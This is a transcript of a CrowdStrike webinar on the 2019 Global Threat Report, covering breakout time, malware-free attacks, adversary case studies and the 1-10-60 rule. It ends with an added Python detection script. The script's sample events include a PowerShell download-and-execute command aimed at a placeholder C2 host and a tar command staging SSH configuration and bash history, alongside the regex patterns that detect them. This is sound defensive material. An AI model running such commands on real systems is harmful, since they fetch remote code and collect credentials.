Adversary Tradecraft and the Importance of Speed to Take Action
"Breakout Time"—the time it takes for an intruder to jump from a compromised machine and move laterally through an organization’s network—is a crucial window to stop a breach, but isn’t the only metric security leaders need to know about.
When an attack is in progress, organizations have on average one minute to detect it, ten minutes to understand it and one hour to contain it. Is your organization ready to meet the 1/10/60 challenge?
Join us for this session as we take an in-depth look at the findings in CrowdStrike’s 2019 Global Threat Report, and discuss the techniques and unique behaviors of today’s adversaries while highlighting the average time an organization needs to take action. Enjoy the video presentation and accompanying transcript below, by Chris Kachigian.
About Chris Kachigian
Chris Kachigian is the Sr. Director of Global Solutions Architecture at CrowdStrike. Chris is responsible for technical aspects of CrowdStrike’s Global Strategic Partnerships. Chris helps our partners deliver better outcomes to customers by solving their security challenges with CrowdStrike’s platform.
Chris comes to CrowdStrike from Tanium, where he led the Partner Technology Integration program from their Technical Account Management organization. Before Tanium, Chris was at Intel as the Sr. Principal Engineer leading the Cyber Security Pathfinding team, focusing on hardware security at Intel's Data Center Group.
Before Intel, Chris spent the majority of his career at Lockheed Martin focusing on full lifecycle cyber security challenges for their customers in the US, UK and Australia, and supported some exploratory work in Europe and the Middle East. He also led their Cyber Security Innovation Program at the NexGen Cyber Innovation and Technology Center, focusing on Cyber (Security, Innovation and Operations), Mobility, Cloud and Digital Transformation. Before that, at Lockheed, he was a cyber security and IT operations SME.
All right, let's get this thing started. Well, hello everybody. Welcome to the CrowdStrike and Ivanti webinar. Today I'm going to be covering adversary tradecraft and the importance of speed. My name is Chris Kachigian. I'm a Senior Director for Solutions Architecture here at CrowdStrike. I have over 15 years' professional experience, and it's been a fun set of experiences that I've had. I was able to grow up in the defense industrial base working for a very large defense contractor, so I could basically learn the basics of IT operations, internal IT security, and doing external-based security for some of our largest customers before I moved into the commercial product space. Then after that I got into startup-land, and it has been a heck of a run ever since; it landed me here at CrowdStrike and it's been a great show so far.
My job here is to help customers, our partners, to enable better security outcomes using solutions designed and built around the CrowdStrike platform. What I'm going to go through today are a couple of different things. First and foremost, I'm going to cover the threat landscape. I'm going to cover some of the pieces about our adversaries, get into some use cases and other things we've seen from the field, but I do want to note and call out that the data sets that I'm going to be covering are from our 2019 Global Threat Report. Now, this is from the entire, I guess, the full-year report that was released a little bit earlier this year. We have subsequently released a couple of updates for things like U3 and some other pieces. Just bear in mind that this data set comes from the full report for the previous year. There could be some other newer pieces out there that we'll have links to towards the end, and we'll make sure we get those in your hands.
Without further ado, what we do here at CrowdStrike is we stop breaches. It's nice and simple, and we do it in a way that is a complete departure from the way that security has been done in the past. We deliver superior endpoint protection on all of your endpoints: Windows, Mac, Linux, mobile, iOS, Android, containers, et cetera, with a single lightweight agent that is managed from the cloud. The reason we're able to do all this is that we are building a platform that encompasses the necessary intelligence, the innovation and the human capital to stop breaches. This approach allows us to outpace the attackers and ultimately provide you with better protection. Let's take a closer look at the platform here and give you all a better understanding of what's going on. About seven years ago, our founders had a vision, and that is: if you want to stop breaches, you need to take a holistic approach.
Cloud delivery was a core component of this brand new approach, but we also ... knew that in order to be truly effective in stopping breaches, we had to inform the platform with deep security expertise. From day one we built into the platform a couple of different tenets, specifically endpoint security, threat intelligence, and managed endpoint hunting alongside incident response and strategic services. This model has also emerged as the new standard within the industry. Gartner has basically redefined the endpoint protection category to align with this, and a number of new competitors have come out with a very similar story. This is just strong validation that our approach, while often imitated, is correct, but also never duplicated.
Let's get into the numbers for you all and let's look at some of the datasets. First and foremost, Threat Graph. Threat Graph is what powers the CrowdStrike platform. It allows us to have global visibility of all the different attack types and targets, and we are able to understand trends and see the patterns. Just from a capabilities perspective, we process about 280 billion events per day, and those numbers are increasing all the time. We see roughly 4 million peak events per second. Again, that's increasing; more than the average, which is a little bit higher than 3 million events per second. Threat Graph is the brains behind the CrowdStrike platform, and that's where a significant portion of the artificial intelligence and machine learning happens for us and allows us to be able to do things at just such a massive scale. Our Falcon agents, or as we call them internally, sensors, are deployed in more than 176 countries, which captures just a ton of data. Right now, we're actually approaching almost 2 trillion events per week and, again, just like the events per day, the numbers are just growing at this point.
Now, one thing that we also did last year was we made the move for the entire Falcon platform to the MITRE ATT&CK framework, away from the Lockheed Martin Kill Chain. We did this so we could actually get a basically stronger common language or framework that allows us, and an organization, to understand the nuances of intrusion activity. It basically allowed us to go another step deeper and understand a bit more than just additional context. One of the things we've taken away and noticed from the migration was that we've actually seen a prevalence, a shift, from malware to more malware-free attacks. This will be things like scripting, things that are only staying in memory, utilizing and abusing built-in system utilities, kind of living-off-the-land techniques.
This is a heat map that is generated by our OverWatch organization. This is definitely a bit of an eye chart, but we do some overall mapping, utilizing all the telemetry we collect, which comes in through Threat Graph, mentioned just a slide or two ago, and we're able to build some of the patterns and just a lot of the activity and techniques that are used by the adversary groups. I'll just hit these up because they're some of the highest ... the hottest from the heat map. Here's just a quick view, so it's much easier for you all to see. Again, this is just some of the data that was collected from our OverWatch organization, but from some of the tactics and techniques that are utilized: the use of valid/stolen accounts.
From the execution side of the house, we're seeing an increase in command-line activity, but also a lot of abuse of PowerShell and overall scripting within the organizations. Then, once again, from a privilege escalation perspective, they're able to dump things like [LSASS 00:06:39] and others to get other valid accounts, get these pieces of information, move laterally through the environment and, overall, just wreak hell and havoc for some of our customer sets.
All right. I mentioned this, the shift away from just traditional malware. Malware is pretty simple, although some of it is complex, but the concept of malware is that it is a piece of malicious binary or something else that is written to disk, and that it's a file that attempts to run on an endpoint. Now, what I mentioned just before was the uptick in malware-free attacks.
This is where the initial tactic is basically one where nothing is being written to disk. Basically, things are either executed from memory or it is basically the abuse of a valid credential using tools and utilities that are actually built into the operating system itself. Basically, to try and avoid detection and, again, stay longer in the infrastructure. If I take a look at malware versus malware-free by industry, we're going to go through here and red is for the malware-free. The gray bars are malware. Towards the top it's sorted by malware-free in descending order. We see that organizations in areas such as media, technology, academia, energy and healthcare, they tend to get ... lead the way with regard to getting targeted by malware-free types of attacks and techniques used by the adversary groups.
On the inverse side, if you look down towards the bottom, we see lots, whether it's oil, gas, pharmaceutical, insurance or financial, that are targeted more heavily on the malware side of the house. Just to, again, allow you to see the picture from an organizational or industry type perspective.
Now, if we go into the malware-free by region, again, the details of all this stuff you'll be able to find in the overall Threat Report, which we'll have linked at the end of the document, but from a North American perspective, we see just a little bit [inaudible 00:08:42] is really the most targeted by use of ... from an average perspective, of malware-free type attacks.
Again, just from a malware perspective, again, North America has the least amount. Now, if you look at things like LatAm, it's a little bit different. We see roughly about 25% of the attack base using malware-free, whereas the traditional malware works, again, or at least it's being used, 75% of the time. Middle East and Pacific end up being around an average of probably about 60 to 65% malware type attacks versus roughly 35 to 40% malware-free.
All right. One of the things here to understand, and this is going to come up in the speed conversation in just a little bit, is understanding who some of the adversary groups are here. We look at the BEAR adversary group, and this is an average of 18 minutes and 49 seconds from the time they establish a beachhead to moving out laterally within different organizations. Then, if we look a little bit towards the middle of the track here, we have the PANDAs, which are related to the Chinese threat actor groups. They average four hours and 26 minutes, but then we get down into the SPIDERs, which are the criminal organizations. We see on average that they have about nine hours, 42 minutes before the breakout, or when the lateral shifts are happening within the infrastructure. This is going to be a good base knowledge for you to understand the speed topics we're going to get into and why you need to care about what's going on.
All right. Let's jump into actually understanding the adversaries and some of their motivations. I'm going to cover three different types here: start with nation state, shift to eCrime and then jump into the ever popular hacktivist area. Most times, even all the time, we say you don't have a malware problem, you have an adversary problem, and this is things ... Attributing back to these particular groups, it can get very granular, down to the groups themselves or to the individuals taking part within those groups. If we look at the motivations, we'll start here with the far left-hand side, which is the state sponsored actors.
Oftentimes it's driven by espionage, especially if we look at the BEAR and the PANDA actor groups. Originally, we focused on the top four, so the BEARs, the PANDAs, the CHOLLIMAs and the KITTENs, so Russia, China, North Korea and Iran, but we have also seen an uptick of others that have been growing over time. Now, if we shift over to the eCrime portion, this is where you're going to find folks that are oftentimes financially motivated, and you're looking at things like financial gain. We do see some bleed-over and overlap with some of these eCrime groups. You know, most of the time the targeting is for profit. Now, last and definitely not least, is over on the hacktivist side, so the non-nation-state actor sets, and you know these are oftentimes politically or socially motivated. It is even sometimes just looking for some attention on various topics.
Ideology falls into a lot of the things that they're looking ... they're doing, but some of these examples could be things like anti-capitalism, or we see things like geopolitical concerns, like we've seen within Ukraine or, even more recently, Hong Kong, or even for ... Oftentimes, it happens quite a bit in the Middle East.
Now, sometimes, we'll actually see that state sponsored actors will try to change their ways to look like criminal or hacktivist groups or their activity. A good example here would be Olympic Destroyer and, basically, they tried to make it look like the North Koreans were doing it. In this particular case though, they changed their tool chain and how it was compiled, et cetera. The interior tool chain looked like the North Koreans, but the exterior tool chain looked like a different threat actor group, which it was eventually tied back to.
All right, now jumping into some of the details about these state sponsored activities. Beginning with the country adversaries, we can see that China remained the most prolific during the 2018 calendar year. GOBLIN PANDA and WICKED PANDA, specifically, underscore the very missions of the Chinese-based targeted intrusion activity, with GOBLIN PANDA representing the intelligence collection within the region and WICKED PANDA representing the broader mission that targeted swaths of sectors and countries. The North Korean-based actors shot up to the number two spot, at least as far as observed volume of adversary activity relating to 2018. LABYRINTH PANDA led the way, but there was a significant amount of activity from some of the newly named CHOLLIMAs like RICOCHET and VELVET. The North Korean targeted intrusion overall mission is an interesting one, combining both traditional intel gathering but also operations, likely focused on currency generation, for a country that is still mostly cut off from the global financial system.
Iranian adversaries were very active during 2018 as well. HELIX KITTEN led the way, but we're also starting to see an emergence of new adversaries and new TTPs from Iran, which is something to watch out for during the remainder of this year.
Somewhat surprisingly, we also saw the Russians fall down the list of overall observed activity compared to North Korea and Iran, but Russian adversaries were still very active last year. FANCY BEAR, in particular, continued its operations and is constantly updating its tooling and toolkits.
All right, I'm going to take you through just some of the use cases and tales from the field that we've seen with our OverWatch organization. Now, in this particular event, it was an unidentified state sponsored adversary that was targeting Linux networks at a telecom provider, and the particular point was that there was a compromised Linux host where defense evasion was employed, and they caused some interesting things to happen there. They compromised the Linux host and used it as a beachhead. We then observed them using base64-encoded Perl commands and GNU tar for staging and exfiltration of configuration files and bash history. There were also extensive efforts to cover their tracks, and they also left a backdoored version of the SSH daemon to allow their return.
Also, too, with regard to the extensive covering of their tracks, we've seen them do a lot of stuff with regard to tampering with and deleting log files. They were timestamping the modified files themselves and also replacing binaries to hide the IP use tools, et cetera.
This is a little bit blurry; the ... of the screenshot will be included in some of the pieces. That little blue circle that's highlighted there is actually unique, because they actually used a unique piece of malware to attack this particular customer set.
All right, now moving on here. We're going to cover MUMMY SPIDER, which is, personally, one of my favorite adversary groups just because of their persistence and their ingenuity. They run overall eight an hour delivery service, for lack of a better way of saying it. They do support multiple cyber or eCrime organizations and other adversary groups. They tend to focus themselves on geo-targeting, with a lot of focus recently on the US, UK and Canada. We've also seen some activity in Europe and Germany as well.
All right, so continuing down the path here with MUMMY SPIDER. We've seen them employing a lot of big game hunting this year. Basically, it's a phishing campaign that's targeting enterprises, because they, generally speaking, tend to have more money they can pay out for a ransom and other pieces. Hence the big game hunting. There was a significant phishing campaign that affected more than 270 CrowdStrike customers in November of 2018. MUMMY SPIDER, utilizing Emotet, tends to utilize macro-enabled Word document files that are sent as an email attachment. Which of these ... Also, worth noting, can be easily blocked by Falcon, just so everyone's aware.
Now, once these macros are enabled, the document launches an obfuscated PowerShell command. Now, this particular set of capabilities ends up reaching out to a command and control infrastructure that retrieved and installed the Emotet dropper. Then the dropper downloaded Emotet as a first stage implant, which, again, Falcon does detect and block. Now the infected hosts would establish communications with known Emotet command and control servers, basically creating persistence. Additional second stage malware was retrieved and installed based on the geolocation of the affected hosts. In this particular case we've seen the BokBot banking trojan used by LUNAR SPIDER and the TrickBot banking trojan being used by WIZARD SPIDER. Then, again, all these things are blocked by the Falcon sensor or agent.
The observed second stage malware that was downloaded illustrated that they are continually collaborating with other criminal organizations. Again, just to further their goals. The one thing I do actually have to call out, because again, I just really enjoyed how they did it: we've even seen things where they have basically multi-headed command and control servers now, again, with different encryption keys. Just kind of really cool, how they're differentiating themselves and the need to evolve and advance their tactics and techniques here.
All right. Moving on, let's cover STARDUST CHOLLIMA. Then, just to reiterate, the CHOLLIMA adversary group does stem from North Korea, and this particular one is targeting the financial industry. A lot of what they do is they use valid or stolen credentials and they use extensive living-off-the-land techniques, which we covered as part of the malware-free stuff we had just spoken about.
Now, this particular threat actor establishes a beachhead within the network and they move laterally. You'll see things like scheduled tasks and WMI, employing things with PowerShell to basically create reverse shells out as well as RDP tunnels, again. Once they get in and establish persistence, they have a way back in. The valid credentials, in this particular case, belonged to some network administrators, and they also basically targeted the domain controllers as some of the first hosts accessed from the beachhead. They used some of the built-in Active Directory utilities to basically do data dumps and then hooked [LSASS 00:19:56] and attempted to dump more credentials. Basically, they can use the built-in utility, export the data, get a better understanding of what the environment looked like, and then dump the credentials and try to shift around and move laterally as a new user within the environment.
Also, this particular adversary group accessed the payment and processing server, indicating they were looking at a financial motivation, again, from the potential perspective. Now, the PowerShell implant that they used accessed documents that also contained sensitive information from the server itself. The implanted piece was actually a unique tool that was written, log.exe, which actually served multiple purposes, including executing malicious DLL payloads as well as creating some of these network tunnels. Log.exe actually injected into a legitimate ... injected payloads into legitimate Explorer processes, into the Explorer memory space, again, looking to avoid detection, and then ... Now, after this customer stopped a breach with OverWatch assistance, the incident response team discovered that the initial vector was actually a publicly exposed, unsecured network monitoring system that did not have the Falcon sensor. Just one of the key takeaways here. It's one of those: get Falcon out there on your platforms. A shameless plug, but it works and it's very good at what it does.
All right, taking a quick look at a services case study. Just shifting away from some of the lessons learned observed from the OverWatch side of the house. Here is a sample of where an adversary group used an employee satisfaction survey. That was actually a front for a payroll heist. This was actually pretty cool and intuitive. In this particular case, they had a spear-phishing email that presented itself as an invitation from an external company to participate in an employee survey. They specifically were targeting an executive within the organization. That executive also didn't think that an employee satisfaction survey had been authorized, so he went ... He or she went to the survey to check it out.
When they actually opened up that survey page, it was hosted on a compromised, unmonitored website that was operated by a small library in the US. It actually employed a web browser vulnerability, which exposed the hash of the victim's credentials. What that adversary group then did was crack the hash offline and utilize the password from the cracked hash to access the enterprise single sign-on system and the executive's email.
Now, the adversary also observed that the enterprise was preparing to outsource payroll to a third party. They'd just be looking at it from an opportunity perspective: with change comes confusion, and therefore opportunity for adversaries to employ what they do. Now, that adversary actually requested password resets for multiple users on this third party payroll portal, and the reset messages were intercepted before the legitimate users could actually see them. Now, what the adversary did is they redirected the payroll to an online bank, with the intent to extract the money via gift cards.
Then we can't not talk about Anonymous, as some of their operations are getting very, very busy in the hacktivist space. Some of the key takeaways, though: they obviously are supporting multiple regional protests all around the world. We can see just from some of these that popped up here that we call out on the slide itself. I won't go through these in detail. You can just look them up offline.
All right, so we can't go through the observations from the field and not talk about recommendations from what we've seen. First and foremost, you know, basic security hygiene is still key and still matters. We start off with the user awareness to combat phishing and other social engineering techniques. We see this continually employed, and we humans are, I mean, not even being cliche, the weakest link. It's effective and it works. Anything that you can do to make your users more aware of what's happening is always good.
Now, these next two bullets are near and dear to my heart. Again, even a shameless plug for Ivanti. We can do and solve the asset management, the software delivery, sorry, software inventory, as well as the vulnerability and patch management processes with the combination of the Ivanti technologies that you have there, between the EPM and vulnerability manager. We can actually fuse some of the IT operations and IT security datasets with the cybersecurity platforms within CrowdStrike to give you absolutely fantastic visibility that just gets the job done.
Combining those two technologies will actually allow you to, again, find assets. You need asset management, because you can't protect what you don't know about. From the software inventory perspective, whether it's using the combination of CrowdStrike's Discover or EPM or the vulnerability stuff within the Ivanti pieces, again, have that visibility so you can find and close said vulnerabilities and reduce the risks and the exposures. Then, from the vulnerability and patch management perspective, again, you have the vulnerability scanners actually scan to confirm that the work you did to close the patches was actually done, and then the patch management solution, again, to discover when you're missing those pieces and get them pushed out there in a very nearly [atomic 00:25:39] fashion. Now that I'm done harping on those four particular aspects of it, let's shift over into multifactor authentication.
MFA combined with privilege management will go a really, really long way towards ensuring that even if you do have a user account that is compromised and you have ... they actually get to the actual credentials, the multifactor authentication will at least serve as an extra step in the way for the adversaries to get in and land within the environment. Hopefully, you'll have some of the privilege management credential pieces set up with credential monitoring so you can see when the abuse attempts are happening, so you can either shut that stuff down or lead up to whatever other actions you plan on taking. Then, obviously, from a password protection perspective for endpoint security software, protect the stuff that you use to protect your infrastructure. I can't stress that enough.
All right. Looking beyond the malware, basically strengthen your defenses against modern attacks. As we were covering the pieces in the ... earlier in the slides, we spoke of malware-free, right? So this is where the adversaries are employing the TTPs where they're using the native tools for nefarious intent, whether it's utilizing stuff like the built-in Active Directory tools or the certificate utilities. Weaponizing PowerShell, for example. They're doing these things on Windows and non-Windows platforms alike. This, obviously, is the alternative to actually writing malware, because they can use all the built-in system utilities to actually do everything, whether it's gathering additional data, establishing persistence, or utilizing all those pieces for command and control.
All right. Then lastly, you have to look at your partners to help solve some of the skills shortage. Behind just about every attack there is a human adversary, all right? They are constantly changing their TTPs in response to the technical controls that you, me, us together are collectively putting into place. Proper defense requires effective and dedicated security personnel. Some of the things we've been seeing is that a lot of organizations, especially when they're competing in basically the global cybersecurity race, or sometimes we'll call it a challenge, to get access to good talent. That is within the ... how work at the companies where they have and they want to operationalize. In this particular case, working with, say, us and Ivanti and their partners, you can utilize the best-in-class external solution providers to help you fill the skills gap in what is hopefully a cost-effective manner for you to do that.
All right. Let's revisit this concept of breakout time by region, by the regional adversaries. I have my call to action for you coming up here in a minute. We'll just take a look here. The BEARs average just under 19 minutes and the SPIDERs are about nine hours and 42 minutes. This matters because in 2017, we actually noticed that the adversaries took one hour and roughly 58 minutes for a breakout time. Interestingly enough, the time increased for 2018. The average we saw in the 2018 timeframe was that the threat actors took four hours and 37 minutes on average to break out from their initial beachhead. Now, a lot of this stuff I don't have some definitive answers for you, but my ... some of the stuff that myself and everyone else here at CrowdStrike believe is that it is ... Some of it is attributed to slower moving adversaries, which you can see there's a few of here.
But also, we do believe that organizations are investing in better controls and better technology. They're adopting things like CrowdStrike and others like us, other next generation technologies that are significantly more effective against adversaries and their tradecraft and, again, slowing them down.
Let's talk about speed, and speed is everything. We're going to hit what CrowdStrike has been talking about a lot lately, the 1-10-60 rule, and it's actually a very simple concept. That concept is that within a minute of something happening, so whether it's a piece of malware or an adversary that has a human on the keyboard, gone active in the environment, you want to be able to detect and know what's happening in a minute or less.
Shifting over to the next portion of it, which is giving you time to investigate. Within 10 minutes, have all the proper tooling to give you the data so that you have ... so you can complete, again, an investigation. You can understand what's happening within a 10 minute timeframe.
Then lastly, the third portion of the step is the time to remediate and contain. You want to basically be able to detect, investigate, and then remediate and contain whatever the issue is within 60 minutes. If I actually just go back a couple of slides here, and we look at this breakout time per region. Now granted, we're talking in averages, so the BEARs' average is, again, just under 19 minutes and the SPIDERs are just under 10 hours. If you can employ that 1-10-60 model, you have the opportunity to beat out all but some of the fastest adversary groups within the infrastructure that I've started to see within the global threat space.
I just want to say, thank you very much for your time today. I recommend you go grab the full threat intel report, which is available at this particular link. Then, when you do that, I would also recommend that you grab some of the quarterly updates we release as well. There's some fantastic data, especially with updates for some of the quarterly trends that we're seeing. I think it'll ... The bulk of data that we have within those will give you a rock solid foundation for you to build up and improve on your security operations and your cybersecurity posture in general, and overall sets you up for better success within the security space.
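As an added example that is not part of the webinar and not CrowdStrike's or Ivanti's code, the two malware-free chains described above, a Word document spawning an encoded PowerShell command (the MUMMY SPIDER/Emotet case) and base64-decoded Perl plus GNU tar staging of configuration files and bash history on a compromised Linux host (the telecom case), can be surfaced from process-creation telemetry with parent/child and command-line rules. The event format, host names and command lines below are constructed for the illustration.

```python
"""Detection rules over constructed process-creation events.

Added example, not CrowdStrike or Ivanti code. It models two malware-free
chains from the webinar: an Office document spawning PowerShell with an
-EncodedCommand payload, and base64-decoded Perl plus tar staging on a
compromised Linux host. The event schema and all sample values are constructed.
"""
import base64
import re
from dataclasses import dataclass

# Office images that should rarely, if ever, spawn a script host or shell.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest alternative first.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# "base64 -d" (or --decode) piped straight into an interpreter.
B64_PIPE = re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:perl|sh|bash|python\d?)\b", re.IGNORECASE)
# tar touching shell history or system configuration is a staging signal worth triage.
STAGED_PATHS = re.compile(r"\.bash_history|/etc/")


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str   # parent process image name
    image: str    # child process image name
    cmdline: str


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(cmdline: str):
    """Return the plaintext behind an -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(ev: ProcEvent) -> list:
    """Apply the rules to one event and return the names of the rules that fired."""
    hits = []
    parent, image = ev.parent.lower(), ev.image.lower()
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawned_shell")
        if decode_powershell(ev.cmdline) is not None:
            hits.append("encoded_powershell")
    if image in {"sh", "bash", "dash"} and B64_PIPE.search(ev.cmdline):
        hits.append("base64_decoded_interpreter")
    if image == "tar" and STAGED_PATHS.search(ev.cmdline):
        hits.append("tar_staging_sensitive_paths")
    return hits


def run(events) -> list:
    """Return (host, rule, cmdline) triples for every rule hit across the events."""
    return [(ev.host, rule, ev.cmdline) for ev in events for rule in evaluate(ev)]


# Constructed sample telemetry (hostnames, payloads and URL are placeholders).
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage1')"
PERL_CMD = "perl -e 'print qq(beacon)'"
SAMPLE_EVENTS = [
    ProcEvent("WS-FIN-07", "winword.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGE1)),
    ProcEvent("WS-FIN-07", "explorer.exe", "powershell.exe", "powershell.exe -NoProfile Get-Date"),
    ProcEvent("telco-edge-03", "sshd", "bash",
              'bash -c "echo %s | base64 -d | perl"' % base64.b64encode(PERL_CMD.encode()).decode()),
    ProcEvent("telco-edge-03", "bash", "tar", "tar czf /tmp/.cache.tgz /etc/ssh /root/.bash_history"),
    ProcEvent("telco-edge-03", "cron", "tar", "tar czf /backup/www.tgz /var/www"),
]

if __name__ == "__main__":
    for host, rule, cmd in run(SAMPLE_EVENTS):
        print(f"{host:14s} {rule:28s} {cmd[:70]}")
    print("decoded:", decode_powershell(SAMPLE_EVENTS[0].cmdline))
```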